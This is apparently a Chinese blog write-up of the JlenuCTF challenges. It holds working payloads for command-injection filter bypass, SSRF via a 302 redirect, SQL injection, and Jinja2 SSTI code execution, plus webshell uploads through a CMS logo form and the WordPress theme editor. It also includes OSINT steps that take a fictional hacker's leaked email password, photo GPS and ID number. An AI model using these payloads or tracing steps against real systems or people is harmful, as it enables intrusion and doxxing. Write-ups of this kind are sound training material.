Y0ng的博客
0%

JIenuCTF

发表于 更新于 分类于

easy_login(web)

首先看网页源码,发现一段加密密钥

又看到有两个js文件是来自平台的,其他文件指向官网,下载两个文件

找到一段加密函数,看到用的是ECB 方式

function _etd2(_p0, _p1) {
           try {
               var _p2 = CryptoJS.AES.encrypt(_p0, CryptoJS.enc.Utf8.parse(_p1),{
                   mode: CryptoJS.mode.ECB,
                   padding: CryptoJS.pad.Pkcs7
                 }).toString();   
               $("#casLoginForm").find("#passwordEncrypt").val(_p2);
           } catch(e) {
               $("#casLoginForm").find("#passwordEncrypt").val(_p0);
           }
       }

抓包验证一下,直接出密码,接下来就是爆破密码,加密,爆破发送

关键是使用bp中的插件:,插件名称:BurpCrypto

BDE_CAT(web)

开局一张猫

查看源码:

<img src='cat.jpg' height=400><!-- is_debug -->

访问?is_debug 得到源码:

<?php
error_reporting(0);
include('flag.php');
$message = "<img src='cat.jpg' height=400><!-- is_debug -->";

if (isset($_GET['is_debug']))
{
    highlight_file(__FILE__) and die();
}
else
{
    $qs = $_SERVER['QUERY_STRING'];
    if(!(substr_count($qs, '_') > 0) && !(substr_count($qs, '%')> 1))
    {
        $cmd = $_GET['c_m_d'];
        if(!preg_match('/(\||&;| |\/|cat|flag', $cmd)){
        system("/sandboxed_bin/".$cmd);
        }else{
        echo $message;
        die();
        }
    }
    echo $message;
    die();
}
?>

$_SERVER['QUERY_STRING'] 意思:

http://localhost/aaa/?p=222

结果:

$_SERVER['QUERY_STRING'] = "p=222";
$_SERVER['REQUEST_URI']  = "/aaa/?p=222";
$_SERVER['SCRIPT_NAME']  = "/aaa/index.php";
$_SERVER['PHP_SELF']     = "/aaa/index.php";

查询的不能含有 _%

且只有get c_m_d才能执行system

php解析特性可以使用+.和代替成 _

/sandboxed_bin/ 后面可以拼接 cat

payload:

?c.m.d=???+????.???

flag: JlenuCTF{hPHPPP_c@t_Bypass}

Easy_SSRF(web)

先看一下网页源码

经过测试,服务器上搭建一个302跳转页面 或者 直接生成个

http://127.0.0.1/flag.php的短链接打过去就行了

1.php:

<?php
echo "1";
header("Location:http://127.0.0.1/flag.php");
?>

访问:

http://120.79.25.56:5566/?url=http://x.x.x.x/1.php

flag: JlenuCTF{ssrf_is_so_esay!}

Strange_SQLI(web)

index.php?id=1%20And%201=1--+
index.php?id=0%20union%20select%20database()   //  jlenu_ctf

测了几次整形注入发现有时候对的也会报错,而且好像还是有规律的报错,导致我不能确定到底是不是过滤,索性直接猜表 和字段,真猜出来了

后来hint:

题目有个动态随机waf用来防止sqlmap,如单条语句无法回显,请多试几次

MIAOHUB(web)

以为是文件上传,谁知道是SSTI???

flask 2.0

发现注入点

查看config:

测了一下,过滤 .[ ]

attr()就行了,多亏了这篇文章,让我又学习了一点SSTI的bypass

Jinja2 SSTI Research

payload:

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}

或者

{{config|attr('__class__')|attr('__init__')|attr('__globals__')|attr('__getitem__')('os')|attr('popen')('ls')|attr('read')()}}

flag: Jlenu{MiaohUB_SO_CUTE!!!!}

CMS_audit(web)

弱密码登录


漏洞位置:上传LOGO

controller\CallAction.class.php
public function upLoad() {
		if (isset($_POST['send'])) {
			$_logoupload = new LogoUpload('pic',$_POST['MAX_FILE_SIZE']);
			$_path = $_logoupload->getPath();
			$_img = new Image($_path);
			$_img->xhImg(960,0);
			$_img->out();
			//echo $_path;
			$_logoupload->alertOpenerClose('图片上传成功!','..'.$_path);
		} else {
			exit('警告:文件过大或者其他未知错误导致浏览器崩溃!');
		}
	}

跟进LogoUpload类,看到验证类型

//验证类型
	private function checkType() {
		if (!in_array($this->type,$this->typeArr)) {
			Tool::alertBack('警告:不合法的上传类型!');
		}
	}

跟进,只判断类型

private $typeArr = array('image/jpeg','image/pjpeg','image/png','image/x-png','image/gif');		//类型合集

上传shell

flag: Jlenu{GOOD_Y0U_Are_HACKED!!!}

YCCMS代码审计(新手教学方向)

warm-up(misc)

直接查看源码,发现flag,unicode解码

flag: JlenuCTF{Y0u_ArE_HOrse_killER}

MY XP(misc)

./volatility -f 111.vmem imageinfo  //imageinfo:查询对应镜像文件的系统信息

./volatility -f 111.vmem --profile=WinXPSP2x86 psscan  //查看进程

./volatility -f 111.vmem –profile=WinXPSP2x86 filescan |grep -E ‘jpg|png|jpeg|bmp|gif|zip|txt’ //查找文件

./volatility -f 111.vmem –profile=WinXPSP2x86 dumpfiles -Q 0x0000000001d27bf0 –dump-dir=./ //dump文件

打开发现base64,解码即可

flag: JlenuCTF{You_ArE_F1nd_mY_XPPPP}

WHATS HAPPEN?(CRYPTO)

直接盲文比对

flag: JlenuCTF{BLINDNEEDHELP}

SIMPIOT(HAPPYGAME)


flag: JlenuCTF{ha-easyy-iOt}

社工一

描述:

  • 魔法少女所维护的网站被黑客攻击了,你是魔法少女请过来的外援大佬,希望你能够帮助魔法少女来进行溯源找到黑客,已知魔法少女对网站进行了备份,加油。 找到后门文件,将黑客id直接提交至平台,无需包装
    D盾发现后门文件

flag: HSYM

蚁剑连上

社工二

描述

  • 很好,你已经找到了黑客的id,请继续溯源,寻找黑客的代理服务器的ip 将代理服务器ip直接提交

社工三

描述:

  • 非常棒,既然你已经找到了黑客的服务器,尝试访问,并找出他的博客后台密码 找出黑客的博客后台密码,直接提交

账号:S114514W@protonmail.com
密码:HSYM20020301

社工四

描述:

  • good,该找的都找得差不多了黑客的邮箱里面可能会有些好东西哦 找出黑客的真实地理位置,地理位置名称提交
  • 先拿shell,然后找邮箱配置备份文件

wordpress getshell总结

进入后台,在外观处写shell

路径:

1.15.98.31/wp-admin/theme-editor.php?file=upload.php&theme=CorePressWPTheme-main
//CorePressWPTheme-main为主题名

url+/wp-content/themes/+主题名/+修改文件的文件名

蚁剑后

使用密码登录邮箱,看到一张照片,下载下来

发现GPS

先转换:

转换地址

在查找:

查找地址

社工五

描述:

  • 非常棒,抓到他。 找到黑客的身份证号,直接提交